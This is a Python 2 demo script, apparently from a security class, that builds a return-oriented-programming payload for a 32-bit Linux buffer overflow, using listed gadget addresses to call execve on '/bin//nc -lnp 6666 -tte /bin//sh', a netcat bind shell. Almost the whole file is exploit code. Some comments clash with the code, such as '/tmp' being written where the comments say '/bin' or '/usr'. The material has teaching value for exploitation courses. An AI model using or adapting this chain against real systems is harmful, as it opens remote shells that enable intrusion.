"""
This is a demo python script that creates a ROP chain to launch nc as:
> /bin//nc -lnp 6666 -tte /bin//sh
The gadgets in the following code are based on my machine & binary and as a result you will have to adjust the gadget based on your environment.
With the latest ROPGadget tool that we used in the class, we get the following ropchain:
- Step 1 -- Write-what-where gadgets

	[+] Gadget found: 0x8056d05 mov dword ptr [edx], eax ; ret
	[+] Gadget found: 0x806ee8b pop edx ; ret
	[+] Gadget found: 0x80a8bf6 pop eax ; ret
	[+] Gadget found: 0x80562c0 xor eax, eax ; ret

- Step 2 -- Init syscall number gadgets

	[+] Gadget found: 0x80562c0 xor eax, eax ; ret
	[+] Gadget found: 0x807c32a inc eax ; ret

- Step 3 -- Init syscall arguments gadgets

	[+] Gadget found: 0x80481c9 pop ebx ; ret
	[+] Gadget found: 0x806eeb2 pop ecx ; pop ebx ; ret
	[+] Gadget found: 0x806ee8b pop edx ; ret

- Step 4 -- Syscall gadget

	[+] Gadget found: 0x8049603 int 0x80

- Step 5 -- Build the ROP chain



"""





#!/usr/bin/env python
from struct import pack
import os
######################################
fileName=raw_input("Enter the file name")
outfile=open(fileName, "wb")
# this is just to create variables of the gadgets that we will be using
DATA       = 0x080da120
EDAX0      = pack("<I", 0x08050a88)
STACK      = pack("<I", DATA)       # @ .data 
INT80      = pack("<I", 0x08049603) # int 0x80
MOVISTACK  = pack("<I", 0x08056d05) # mov dword ptr [edx], eax ; ret
INCEAX     = pack("<I", 0x0807c32a) # inc eax ; ret
POPEDX     = pack("<I", 0x0806ee8b) # pop edx ; ret
POPECXEBX  = pack("<I", 0x0806eeb2) # pop ecx ; pop ebx ; ret
POPEAX     = pack("<I", 0x080a8bf6) # pop eax ; ret
XOREAX     = pack("<I", 0x080562c0) # xor eax, eax ; ret
DUMMY      = pack("<I", 0x42424242) # padding

buff  = "\x42" * 32
buff += "BBBB"*3

buff += POPEDX 				# it's via %ecx we will build our stack.
buff += STACK				# %ecx contain the stack address.

buff += POPEAX				# Lets put content in an address
buff += "/tmp"				# put "/usr" in %eax
buff += MOVISTACK			# put "/bin" in stack address

buff += POPEDX
buff += pack("<I", DATA + 4)	# we change our stack for to point after "/bin"

buff += POPEAX				# Applying the same for "/nc"
buff += "//nc"
buff += MOVISTACK			# we place "//nc" after "/bin"

buff += POPEDX
buff += pack("<I", DATA + 9)	# we change our stack for to point after "bin//nc"+1

# we repeated operation for each argument
buff += POPEAX
buff += "-lnp"
buff += MOVISTACK

buff += POPEDX
buff += pack("<I", DATA + 14)

buff += POPEAX
buff += "6666"
buff += MOVISTACK

buff += POPEDX
buff += pack("<I", DATA + 19)

buff += POPEAX
buff += "-tte"
buff += MOVISTACK

buff += POPEDX
buff += pack("<I", DATA + 24)

buff += POPEAX
buff += "/bin"
buff += MOVISTACK

buff += POPEDX
buff += pack("<I", DATA + 28)

buff += POPEAX
buff += "//sh"
buff += MOVISTACK

#
# We currently have our list of elements separated by \0
# Now we must construct our char ** i.e. array 'argguments' of strings
# arguments=[ @"/bin//nc", @"-lnp", @"6666", @"-tte", @"/bin//sh"]
# 

buff += POPEDX				
buff += pack("<I", DATA + 60)	# shadow stack address (@ of arguments)

buff += POPEAX
buff += pack("<I", DATA) 		# @ of "/bin//nc" 0th item of arguments[]
buff += MOVISTACK			# we place address of "/bin//nc" in our STACK

buff += POPEDX
buff += pack("<I", DATA + 64)	# we shift our Stack Pointer + 4 for the second argument

buff += POPEAX
buff += pack("<I", DATA + 0x9) 		# @ of "-lnp"
buff += MOVISTACK			# we place address of "-lnp" in our STACK

buff += POPEDX
buff += pack("<I", DATA + 68)	# we shift our Stack Pointer + 4 for the 3rd argument

buff += POPEAX
buff += pack("<I", DATA + 0xe) 		# @ of "6666"
buff += MOVISTACK			# we palce address of "6666" in our STACK

buff += POPEDX
buff += pack("<I", DATA + 72)	# we shift our Stack Pointer + 4 for the 4th argument

buff += POPEAX
buff += pack("<I", DATA + 0x13) 		# @ of "-tte"
buff += MOVISTACK			# we place address of "-tte" in our STACK

buff += POPEDX
buff += pack("<I", DATA + 76)	# we shift our Stack Pointer + 4 for the 5th argument

buff += POPEAX
buff += pack("<I", DATA + 0x18) 		# @ of "/bin//sh"
buff += MOVISTACK			# we place address of "/bin//sh" in our STACK

    #
    # Now we must implement eax to contain the address of 
    # the execve syscall.
    # execve = 0xb
    #

buff += XOREAX				# %eax is put to zero.
buff += INCEAX * 11			# %eax is now 0xb
buff += POPEDX				# last pop 
buff += pack("<I", DATA + 48) 	# edx char *env
buff += POPECXEBX				# last pop 
buff += pack("<I", DATA + 60) 	# ecx char **arguments
buff += pack("<I", DATA)      	# ebx "/usr/bin//nc"
buff += INT80				# we execute
outfile.write(buff)
outfile.close()

#print buff